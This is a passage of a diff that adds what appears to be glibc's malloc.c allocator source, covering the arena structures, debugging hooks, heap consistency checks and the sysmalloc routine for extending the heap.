+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunked are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+	    /* Oops!  Someone else killed our space..  Can't touch anything.  */
+	    malloc_printerr ("break adjusted to free malloc space");
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
